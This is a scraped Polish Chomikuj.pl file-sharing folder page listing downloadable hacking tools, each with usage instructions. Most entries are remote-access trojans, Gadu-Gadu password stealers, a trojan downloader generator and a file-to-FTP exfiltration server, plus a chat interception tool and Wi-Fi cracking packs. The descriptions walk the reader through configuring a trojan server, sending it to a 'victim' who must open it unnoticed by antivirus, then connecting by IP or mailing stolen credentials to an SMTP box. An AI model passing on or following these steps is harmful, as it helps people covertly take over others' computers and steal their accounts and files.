Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto
Maaaaanius
  • Prezent Prezent
  • Ulubiony
    Ulubiony
  • Wiadomość Wiadomość

widziany: 25.01.2022 17:09

  • pliki muzyczne
    61
  • pliki wideo
    88
  • obrazy
    55
  • dokumenty
    60

400 plików
51,47 GB

« poprzednia stronanastępna strona »
  • 1,7 MB
  • 26 kwi 12 15:58
Obsługa programu:
1. Zakładamy numer Gadu-Gadu.
Aby założyć numer GG, musimy uruchomić komunikator Gadu-Gadu, a następnie, z menu wybrać Użytkownik -> Nowy.
Po założeniu numeru, zapisz sobie nowy numer, oraz hasło do niego.
2. Ściągamy skompresowany plik o nazwie AdminGG.zip
Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: AdminGG.exe
3. Uruchamiamy program Admin GG. Uruchamia się program widziany na screenie:

obrazek

W polu oznaczonym jako "numer gg" wpisujemy numer Gadu-Gadu, który wcześniej założyliśmy (patrz punkt 1), a w polu "hasło gg" hasło do tego numeru. Następnie klikamy na przycisk "Kompiluj", oraz wskazujemy miejsce gdzie ma zostać zapisany skonfigurowany przed chwilą plik.
4. Plik, który przed chwilą skonfigurowałeś uruchamiasz na komputerze, którym chcesz sterować. Np. Jeśli zamierzasz sterować komputerem kolegi, wysyłasz mu ten plik np. na emaila lub dajesz na dyskietce. Żeby program działał, kolega musi uruchomić ten plik na swoim komputerze. Następnie do swojej listy kontaktów, dodajesz numer, który założyłeś (punkt 1) i który posłużył ci do konfiguracji pliku, który wysłałeś do kolegi.
Jeśli kolega uruchomił plik na swoim komputerze, numer który dodałeś do listy będzie miał status "Dostępny", w czasie gdy kolega będzie miał włączony komputer.
Plik uruchomiony na komputerze kolegi, będzie się automatycznie włączał przy starcie systemu Windows.
Uwaga! Nie możesz dać kilku osobom jednego, tego samego skonfigurowanego pliku! Dzieje się tak, ponieważ plik używa numeru Gadu-Gadu, który podałeś przy konfiguracji pliku. Jeden skonfigurowany plik może działać tylko na jednym komputerze. Gdy chcemy wysłać plik kilku osobom, należy dla każdej z nich skonfigurować osobny plik, każdy z nowym numerem Gadu-Gadu.
5. Jeśli wykonałeś poprawnie wszystkie instrukcje zawarte w punktach
1, 2, 3, 4 możesz rozpocząć sterowanie komputerem osoby, która uruchomiła skonfigurowany plik, np. kolega. Sterowanie odbywa się przez wysyłanie odpowiednich komend, na numer, który zapisałeś na liście kontaktów zgodnie z punktem czwartym.

Lista komend:
opencd - wysuwa tackę CD-ROM
closecd - wsuwa tackę CD-ROM
spo - wyłącza monitor
turnscr - odwraca obraz na monitorze "do góry nogami"
pulpithide - ukrywa ikony na pulpicie, tym samym go blokując
pulpitshow - pokazuje ikony na pulpicie
timehide - ukrywa zegarek systemowy
timeshow - pokazuje zegarek systemowy
shutdown - wyłącza komputer
open "adres_strony" - uruchamia dowolną stronę internetową w domyślnej przeglądarce,
zamiast "adres_strony" wpisujemy adres dowolnej strony WWW (bez "") np "open www.google.pl"
msg "tresc_komunikatu" - pokazuje komunikat o dowolnej treści np. "msg Mam cię!"
help - pokazuje spis komend.
6. Komendy można wysyłać na odpowiedni numer jedynie wtedy, gdy jest on Dostępny na liście kontaktów.
7. Jeśli to wszystko przeczytałeś to brawo :)

zachomikowany

  • 82,3 MB
  • 5 lut 12 17:54
Zbiór programów do łamania wi fi

z chomika pitul1

  • 79,4 MB
  • 29 sty 12 19:32
obrazek
MAGIX PC Sprawdź i tuning 2010 jest kompleksowym rozwiązaniem oprogramowania do badań prognostycznych, utrzymania i przyspieszenia PC i laptopów z systemem Windows XP, Vista i Windows 7.The "PC Check" sekcji centralnej części programu do analizy komputera i rozwiązywania zidentyfikowanych problemów w jednym kroku. Examine PC Zbadać PC
Funkcja "Sprawdź, czy komputer" kontroli komputera za ewentualne problemy i błędy. Wyniki są wyświetlane po kilku sekundach w sprawozdaniu, a także odpowiednich rozwiązań proponowanych. Poszczególne wyniki badań są wizualizowane w światłach.
NOWOŚĆ! Automatic tuning Automatyczne strojenie

"PC Check" sekcji centralnej części programu do analizy komputera i rozwiązywanie zidentyfikowanych problemów w jednym kroku.

Zbadać PC
Funkcja "Sprawdź, czy komputer" kontroli komputera za ewentualne problemy i błędy. Wyniki są wyświetlane po kilku sekundach w sprawozdaniu, a także odpowiednich rozwiązań proponowanych. Poszczególne wyniki badań są wizualizowane w światłach.

Rozwiązać wszystkich problemów
Pod czerwonym świetle będą wyświetlane, gdzie utrzymanie lub optymalizacji muszą być przeprowadzane. Przycisk "Rozwiązywanie problemów" wiązki kilka rodzajów zajęć i niesie je w jednym kroku.

zachomikowany

  • 4,2 MB
  • 29 sty 12 19:30
Darmowy internet !!!

Program wyszukuje niezabezbieczone sieci bezprzewodowe w naszej okolicy.

Image.aspx?id=122832737
WiFi Radar jest małym programem który wyszukuje niezabezbieczone sieci bezprzewodowe w naszej okolicy. Wystarczy kilka kliknięć i możemy się cieszyć sie darmowym internetem w naszym laptopie w dowolnym miejscu o dowolnej porze.
To darmowe narzędzie wyszukuje sieci bezprzewodowe i pokazuje nam je w oknie podobnym do radaru wojskowego. Jeżeli na radarze zauważymy czerwony kwadracik to znaczy ze znaleźliśmy zabezpieczoną sieć do której nie możemy się podłączyć. Lecz gdy kwadracik będzie miał barwę zieloną jest to sieć niezabezpieczona do której możemy się bez problemu połączyć klikając "connect". Narzędzie to jest całkowicie darmowe i legalne.

Chcesz wysłać maila lub przejrzeć stronę WWW, a nie możesz z powodu braku sygnału w twojej karcie GPRS? I pewnie często się zdarza, że przeprowadzasz długą podróż w poszukiwaniu fal WiFi. Teraz nie stanowi to problemu, gdyż firma Makayama wprowadziła do swojej oferty program, który wyszukuje hot-spoty z bezprzewodowym dostępem do sieci.

Easy WiFi Radar jest programem pod platformę Windows. Punkty z łączem WiFi przedstawia na radarze w postaci czerwonych i zielonych punktów. Jego obsługa jest banalnie łatwa i nie wymaga specjalnie skomplikowanych działań z kartą WiFi.

z chomika Tygrysek888

  • 9,5 MB
  • 29 sty 12 19:29
Opis
Wolny komputer? Program do przyspieszania komputera - SLOW-PCfighter zwiększy wydajność i wydłuży żywotność Twojego komputera!

Program do przyspieszania komputera SLOW-PCfighter Twój komputer spowalnia ostatnio? Czujesz irytacje niecierpliwie wpatrując się w ekran? Jeśli tak, nie panikuj! Istnieje wiele przyczyn wolnego działania komputerów i spotyka to każdego. To po prostu oznacza, że twój komputer potrzebuje profesjonalnej pomocy!

SLOW-PCfighter wykorzystuje najbardziej zaawansowane technologie dostępne do analizy błędów i przyspiesza prace komputera. SLOW-PCfighter wyszukuje i usuwa wszystkie niepotrzebne wpisy w rejestrze wynikające z wadliwego oprogramowania, wadliwe instalacje sterowników i optymalizuje uruchamianie systemu Windows.

zachomikowany

  • 4,2 MB
  • 29 sty 12 19:28
Darmowy internet !!!

Program wyszukuje niezabezbieczone sieci bezprzewodowe w naszej okolicy.

Image.aspx?id=122832737
WiFi Radar jest małym programem który wyszukuje niezabezbieczone sieci bezprzewodowe w naszej okolicy. Wystarczy kilka kliknięć i możemy się cieszyć sie darmowym internetem w naszym laptopie w dowolnym miejscu o dowolnej porze.
To darmowe narzędzie wyszukuje sieci bezprzewodowe i pokazuje nam je w oknie podobnym do radaru wojskowego. Jeżeli na radarze zauważymy czerwony kwadracik to znaczy ze znaleźliśmy zabezpieczoną sieć do której nie możemy się podłączyć. Lecz gdy kwadracik będzie miał barwę zieloną jest to sieć niezabezpieczona do której możemy się bez problemu połączyć klikając "connect". Narzędzie to jest całkowicie darmowe i legalne.

Chcesz wysłać maila lub przejrzeć stronę WWW, a nie możesz z powodu braku sygnału w twojej karcie GPRS? I pewnie często się zdarza, że przeprowadzasz długą podróż w poszukiwaniu fal WiFi. Teraz nie stanowi to problemu, gdyż firma Makayama wprowadziła do swojej oferty program, który wyszukuje hot-spoty z bezprzewodowym dostępem do sieci.

Easy WiFi Radar jest programem pod platformę Windows. Punkty z łączem WiFi przedstawia na radarze w postaci czerwonych i zielonych punktów. Jego obsługa jest banalnie łatwa i nie wymaga specjalnie skomplikowanych działań z kartą WiFi.

z chomika Tygrysek888

  • 4,7 MB
  • 17 sty 12 21:15
Obsługa programu:
1. Trojan służący do kradzieży haseł GG, a co za tym idzie konta GG.
2. Ściągamy skompresowany plik o nazwie Gadu wireader 1.zip
3. Dekompresujemy ten plik i wchodzimy do folderu.
3. Odpalamy u siebie plik gadu_wireader1.4.exe, czyli plik client. Otwiera się program widziany na screenie:

4. Uzupełniany wszystkie okienka swoimi danymi i klikamy na opcję utwórz trojana.
5. Następnie utworzony plik (czyli trojan) wysyłamy do naszej ofiary.

z chomika terminator000

1 komentarz

  • 11,7 MB
  • 17 sty 12 21:14
hackowanie nk

z chomika terminator000

  • 7,6 MB
  • 17 sty 12 21:04
Podsłuch gg działa

z chomika terminator000

  • 0,7 MB
  • 17 sty 12 21:02
obrazek

1. Wysyłasz koledze Serwer (możesz dowolnie zmieniać mu nazwę i ikonę)
2. Kolega Otwiera Serwer
3. Ty Odpalasz Klient.exe wpisujesz w Polu "Adres IP" IP kolegi
4. Klikasz Połącz i zaczynasz Zabawę

Spis Funkcji:

-Chowaj Ikony
-Pokaż Ikony
-Zamień Przyciski Myszy
-Napraw Przyciski Myszy
-Teleport Myszy w lewy górny róg
-Zawieś mysz (polega na tym ze co pół sekundy kursor znajdzie się w lewym górnym rogu)
-Odwieś Mysz (puszcza blokadę)
-Strona (auto cenzura)
-Komputer Mówi ("Frankenstein Virus")
-Obróć Ekran o 180 stopni
-Schowaj Start
-Pokaż Start
-Odwróć Kolory Ekranu
-Wyczyść Schowek
-Zmień Tapetę
-Ukryj Zegarek
-Wywal Error (Błąd)
-Włącz Wygaszacz
-Otwórz CD-ROM
-Zamknij CD-ROM
-Włącz Monitor
-Wyłącz Monitor
-Wyłącz CTRL+ALT+DELETE (manager)
-Włącz CTRL+ALT+DELETE (manager)
-Chowaj Pasek (Na dole-Start itd)
-Pokaż Pasek
-Dźwięk Startu Systemu
-Odegraj Beep
-Dodaje się do Autostartu
-Wyłącza Zaporę Systemową

z chomika terminator000

  • 0,5 MB
  • 17 sty 12 20:53
Można sprawdzić dany nr IP oraz go zlokalizować

z chomika terminator000

  • 2,2 MB
  • 17 sty 12 20:52
obrazek

Program do włamywania się na czyjś komputer po przez nr. Ip

z chomika terminator000

  • 220 KB
  • 17 sty 12 20:46
obrazek

z chomika terminator000

  • 4,9 MB
  • 17 sty 12 19:18
obrazek
OPIS:
- Rejestrujesz sobie nowy numer GG.
- Wpisujesz go i hasło do programu do 2 lewych okienek.
- Wpisujesz numer i nazwę pierwszej ofiary
- Wpisujesz numer i nazwę drugiej ofiary
- Klikasz połącz
- Teraz musisz odpowiednio zagadać do pierwszej i drugiej ofiary, lub do
dwóch jednocześnie.

Zaczyna się ich dialog, a ty czytasz i śmiejesz się z nich.
Możesz w każdej chwili podszywać się pod jedną lub drugą ofiarę i zagadywać w trakcie ich rozmowy.

Używany jest w ich rozmowie twój numer GG (dlatego najlepiej utwórz sobie nowy),
i tylko z takim ofiary gadają.
Jedna ofiara nie widzi prawdziwego numeru drugiej ofiary, każda gada z twoim.

A działa to tak:
- wiadomość jednej ofiary wędruje do twojego numeru
- ty ją czytasz
- potem wiadomość ta wędruje z twojego numeru do drugiej ofiary
Po prostu jesteś w centrum ich rozmowy

Życzę miłej zabawy!

z chomika terminator000

  • 356 KB
  • 17 sty 12 8:23
Mini Opis : Server programu wyszukuje wskazany plik na dysku C i D - a potem wysyła
go na FTP.

z chomika radsio

  • 3,0 MB
  • 16 sty 12 20:49
Obsługa programu:
1. Ściągamy plik AsbMay 2.zip Plik jest skompresowany, więc musimy go zdekompresować. Wchodzimy do zdekompresowanego folderu i widzimy kilka plików, najważniejsze z nich to:
-AsbMay.exe (jest to plik client, otwieramy go)
-Edit Serwer.exe (służy do odpowiedniego skonfigurowania trojana, otwieramy go)
-Serwer.exe (czyli sam trojan, tego pliku nie wolno otwierać, wysyłamy go do ofiary)
2. Najpierw otwieramy plik Edit Serwer.exe, dzięki któremu odpowiednio skonfigurujemy naszego trojana. Uruchamia się program widziany na screenshoocie:

3. Jak już odpowiednio skonfigurowaliśmy naszego trojana to teraz możemy wysłać go do naszej ofiary. Wysyłamy więc plik serwer do ofiary.
4. Teraz otwieramy plik AsbMay.exe, za pomocą którego połączymy się z kompem naszej ofiary. Uruchamia się program widziany na screenshoocie w którym musimy podać adres IP i port no i nacisnąć opcję "connect"
<a>

zachomikowany

  • 2,3 MB
  • 16 sty 12 20:48
Obsługa programu:
1. Jest to trojan pobierający z Internetu inne szkodliwe programy bez wiedzy i zgody użytkownika zainfekowanego komputera. Trojan powstał przy użyciu środowiska programistycznego MASM32 i wygenerowany plik servera zawiera około ~850 bajtów.
2. Ściągamy skompresowany plik o nazwie Mo4x Downloader 0.zip
3. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:

4. Z całego rozpakowanego folderu nas interesuje tylko jeden plik:
GENERATOR.exe Zaznaczony na powyższym screenie czerwonym kółkiem.
5. Uruchamiamy ten plik u siebie (czyli GENERATOR.exe)
Uruchomi się program w którym musimy podać link, do miejsca w którym umieściliśmy szkodliwe oprogramowanie. Następnie klikamy na Generuj.
5. W folderze powstaje nowy plik (trojan), którego nie wolno otwierać. Wysyłamy go do naszej ofiary. Kiedy ofiara go otworzy trojan ściągnie i odpali wskazany przez na program ;]
PS: Sorry że nie dałem screena z programu Generator.exe ale nie mogłem go w żaden sposób wykonać :(

zachomikowany

  • 3,0 MB
  • 16 sty 12 20:47
Obsługa programu:
1. Ściągamy plik AsbMay 2.zip Plik jest skompresowany, więc musimy go zdekompresować. Wchodzimy do zdekompresowanego folderu i widzimy kilka plików, najważniejsze z nich to:
-AsbMay.exe (jest to plik client, otwieramy go)
-Edit Serwer.exe (służy do odpowiedniego skonfigurowania trojana, otwieramy go)
-Serwer.exe (czyli sam trojan, tego pliku nie wolno otwierać, wysyłamy go do ofiary)
2. Najpierw otwieramy plik Edit Serwer.exe, dzięki któremu odpowiednio skonfigurujemy naszego trojana. Uruchamia się program widziany na screenshoocie:

3. Jak już odpowiednio skonfigurowaliśmy naszego trojana to teraz możemy wysłać go do naszej ofiary. Wysyłamy więc plik serwer do ofiary.
4. Teraz otwieramy plik AsbMay.exe, za pomocą którego połączymy się z kompem naszej ofiary. Uruchamia się program widziany na screenshoocie w którym musimy podać adres IP i port no i nacisnąć opcję "connect"
<a>

zachomikowany

  • 2,0 MB
  • 16 sty 12 8:35
obrazek

Program złodziej GG służy do wykradania plików config.dat i archives.dat.

Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Zlodziej GG v1.1.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Teraz odpalamy plik o nazwie: "Złodziej GG v1.1". Uruchamia się program widziany na screenie:

3. Uzupełniasz wszystkie ramki i klikasz na opcję "Generuj"
Teraz wysyłamy plik "sgg.exe" (możemy zmienić nazwę pliku) do osoby którą chcemy "okraść".

4. PRZYKŁADOWA KONFIGURACJA NA SKRZYNCE WP.PL:
-Email:
jankowalski@wp.pl
-Login:
jankowalski
-Hasło:
********
-Smtp:
smtp.wp.pl
-Port:
25

5. PRZYKŁADOWA KONFIGURACJA NA SKRZYNCE POCZTA.FM:
-Email:
jankowalski@poczta.fm
-Login:
jankowalski
-Hasło:
********
-Smtp:
www.poczta.fm
-Port:
25

z chomika terminator000

  • 1,9 MB
  • 15 sty 12 14:10
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Prosiak 0.70 beta 7"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"client.exe", "konfig.exe"
3. Odpalamy plik "konfig.exe". Uruchomi się aplikacja widziana na screenie:
obrazek
Dzięki niej stworzymy i odpowiednio skonfigurujemy serwer trojana.
Kiedy wszystko poprawnie wpisaliśmy klikamy na opcję "Zapisz"
4. Teraz plik serwer (który utworzyliśmy) wysyłamy do naszej ofiary. Ofiara musi go otworzyć.
5. My zaś otwieramy plik "client.exe". Uruchamia się aplikacja widziana na screenie:
obrazek
Podajemy adres IP naszej ofiary, port i hasło jakie wpisaliśmy w "konfig.exe" do naszego backdoora. No i się łączymy z jej kompem ;]

zachomikowany

  • 1,9 MB
  • 15 sty 12 14:10
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Snape 1.2"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
klient.exe, server.exe
3. Plik o nazwie serwer.exe podrzucamy naszej ofiarze.
4. My zaś otwieramy plik klient.exe, klikamy na zakładkę "Połączenie", w której podajemy adres IP ofiary i klikamy na "Połącz"

obrazekobrazek

zachomikowany

  • 1,9 MB
  • 15 sty 12 14:10
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Snape 1.2"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
klient.exe, server.exe
3. Plik o nazwie serwer.exe podrzucamy naszej ofiarze.
4. My zaś otwieramy plik klient.exe, klikamy na zakładkę "Połączenie", w której podajemy adres IP ofiary i klikamy na "Połącz"

obrazekobrazek

zachomikowany

  • 1,8 MB
  • 15 sty 12 14:10
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Luzak 2.00.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
luzak_2.00.exe, server.exe
3. Plik o nazwie server.exe wysyłamy do naszej ofiary.
4. My zaś otwieramy plik o nazwie luzak_2.00.exe. Uruchamia się program widziany na screenie, w ktorym podajemy adres IP naszej ofiary i klikamy na Connect
obrazek

zachomikowany

  • 1,7 MB
  • 15 sty 12 14:10
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "RMF FM 1.1.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
rmf.exe, setup.exe
3. Plik o nazwie setup.exe (czyli serwer) podrzucamy naszej ofiarze.
4. My zaś otwieramy plik o nazwie rmf.exe (czyli client). Uruchomi się program widziany na screenie, w którym musimy podać adres IP naszej ofiary i kliknąć na opcję "connect"
obrazekobrazek

zachomikowany

  • 5,3 MB
  • 15 sty 12 14:08
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Ramirez 2.0.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy foldery:
"klient", "serwer"
3. Wchodzimy do folderu "Serwer" i wysyłamy do naszej ofiary plik znajdujący się w tym folderze. Jest to plik o nazwie "scanlog.exe". Potem ofiara musi ten plik odpalić, a jej antywir nic nie zczaić.
4. My zaś wchodzimy do folderu o nazwie "klient" i odpalamy plik o nazwie "Klient.exe". Uruchamia się program widziany na screenie w którym musimy podać adres IP i kliknąć na opcję "Connect".
obrazek

zachomikowany

  • 1,6 MB
  • 15 sty 12 14:07
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Matrix 1.03.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"The_Matrix.exe", "server.exe", "server2 (bez konfiga).exe"
3. Plik "server.exe" lub "server2 (bez konfiga).exe" musimy podesłać naszej ofiarze, Ofiara musi go otworzyć a jej antywir nic nie zczaić.
4. Następnie otwiearmy u siebie plik klient o nazwie "The_Matrix.exe".Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i klikamy na opcję Connect ;]
obrazek

zachomikowany

  • 1,6 MB
  • 15 sty 12 14:07
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Skun 0.11.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"client_011.exe", "server_011.exe".
3. Plik "server_011.exe" musimy podesłać naszej ofiarze. Ofiara musi otworzyć ten plik a jej antywir nic nie zczaić.
4. Następnie otwiearmy u siebie plik klient o nazwie "client_011.exe".Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i swoje a potem klikamy na magiczną opcję Connect ;]
obrazek

zachomikowany

  • 2,2 MB
  • 15 sty 12 14:02
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Strike Backdoor 0.96.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"strike.exe", "server.exe".
3. Plik "server.exe" musimy podesłać do naszej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zaczaić.
4. Następnie otwiearmy u siebie plik klient o nazwie "strike.exe". Uruchamia się program widziany na screenie:
obrazek
Klikamy na opcję "Połącz z komputerem zdalnym (serwerem)". Wyskakuje nam okienko w którym musimy podać HOST ofiary (który ustalamy np. na podstawie jej IP) i klikamy na opcję połącz.

zachomikowany

  • 2,7 MB
  • 15 sty 12 14:00
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Nishica 1.0.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"Nishica.exe", "win98.exe", "winXp.exe", "ResHacker.exe"
3. Plik "win98.exe" lub "winXp.exe" (w zależności od wersji systemu jakiego używa nasza ofiara), musimy podesłać do naszej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zaczaić.
4. My zaś otwieramy plik "Nishica.exe". Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i klikamy na opcję Połącz.
obrazek5. Acha plik"ResHacker.exe" może posłużyć np. do zmiany ikon.

zachomikowany

  • 1,7 MB
  • 15 sty 12 13:59
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Mass Conect 2.0 beta.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"mc2.exe"
3. Odpalamy plik o nazwie "mc2.exe". Uruchamia się program widziany na screenie:
obrazek4. Najpierw klikamy na zakładkę "Ustawienia Klienta". Uruchomi się okienko widziane poniżej. Musimy je uzupełnić odpowiednimi danymi i kliknąć na opcję "Zapisz"
obrazek5. Następnie musisz kliknąć na zakładkę "Ustawienia serwera". Uruchamia się program widziany na screenie, który należy uzupełnić odpowiednimi danymi i kliknąć na opcję "Zapisz". Dzięki temu powstanie plik serwer.
obrazek6. Plik serwer który przed chwilą utworzyłeś należy wysłać do swojej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zczaić.
7. Na koniec otwierasz plik "mc2.exe" i wysyłasz odpowiednią komendę na serwer trojana.
PS: Więcej informacji o obsłudze trojana znajdziesz w pliku "Info.txt" w paczce.

zachomikowany

« poprzednia stronanastępna strona »
  • Pobierz folder
  • Aby móc przechomikować folder musisz być zalogowanyZachomikuj folder
  • dokumenty
    1
  • obrazy
    0
  • pliki wideo
    0
  • pliki muzyczne
    0

44 plików
276,92 MB




Seriale_LOVE

Seriale_LOVE napisano 5.02.2013 12:15

zgłoś do usunięcia

 

 

Seriale_LOVE

*SERIALE RMVB i AVI Lektor pl lub Napisy*

*Nowości Filmowe*

*Ally McBeal * Siostrzyczki * Czas Honoru * Pamiętniki Wampirów * Fringe * Teen Wolf * Glee * i wiele innych POLSKIE i ZAGRANICZNE

* TELENOWELE z LEKTOREM Katchora to ja * Serce Klarity *Brzydula Betty* El Zorro * Fiorella * Luz Maria* i wiele więcej

* SERIE FILMOWE: min. Matrix * Król Skorpion * Blade * Władca Pierścieni * American Pie * Straszny Film * i wiele innych

KLIKNIJ

wadem-org

wadem-org napisano 24.10.2013 20:05

zgłoś do usunięcia

RMVB ZAOSZCZĘDŹ SWÓJ TRANSFER ZAPRASZAM DO POBIERANIA !

ZAPRASZAM DO FOLDERU >FILMY NOWE 2013< DUZY SPRAWDZONY WYBOR FILMOW.? WLASNY UPLOAD ?

DragonRed

DragonRed napisano 17.07.2014 13:20

zgłoś do usunięcia
:Zapraszam do mojego chomiczka . Na moim chomiku znajdują się treningi Mel B na wszystkie części ciała , które chcemy ćwiczyć . Znajdują się tam nie tylko treningi ale także Zumba , dla tych , którzy chcą sobie trochę spalić kalorie . Zapraszam do pobierania i CHOMIKOWANIA .Pozdrawiam i życzę miłego dnia
mili506

mili506 napisano 2.08.2014 18:54

zgłoś do usunięcia
obrazek
darmowe_fragmenty

darmowe_fragmenty napisano 27.08.2014 19:33

zgłoś do usunięcia
Zapraszam do mnie
beautiful.anya

beautiful.anya napisano 11.12.2014 18:39

zgłoś do usunięcia
1000 gb free na nowości filmowe Sobota 13.12.2014 godz.20 Zapraszam
darmowe_fragmenty

darmowe_fragmenty napisano 11.07.2015 22:46

zgłoś do usunięcia
Tekst alternatywny
henibok848

henibok848 napisano 1.04.2022 14:34

zgłoś do usunięcia
Super chomik
fanad51275

fanad51275 napisano 23.11.2022 13:06

zgłoś do usunięcia
Super chomik

Musisz się zalogować by móc dodawać nowe wiadomości do tego Chomika.

Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności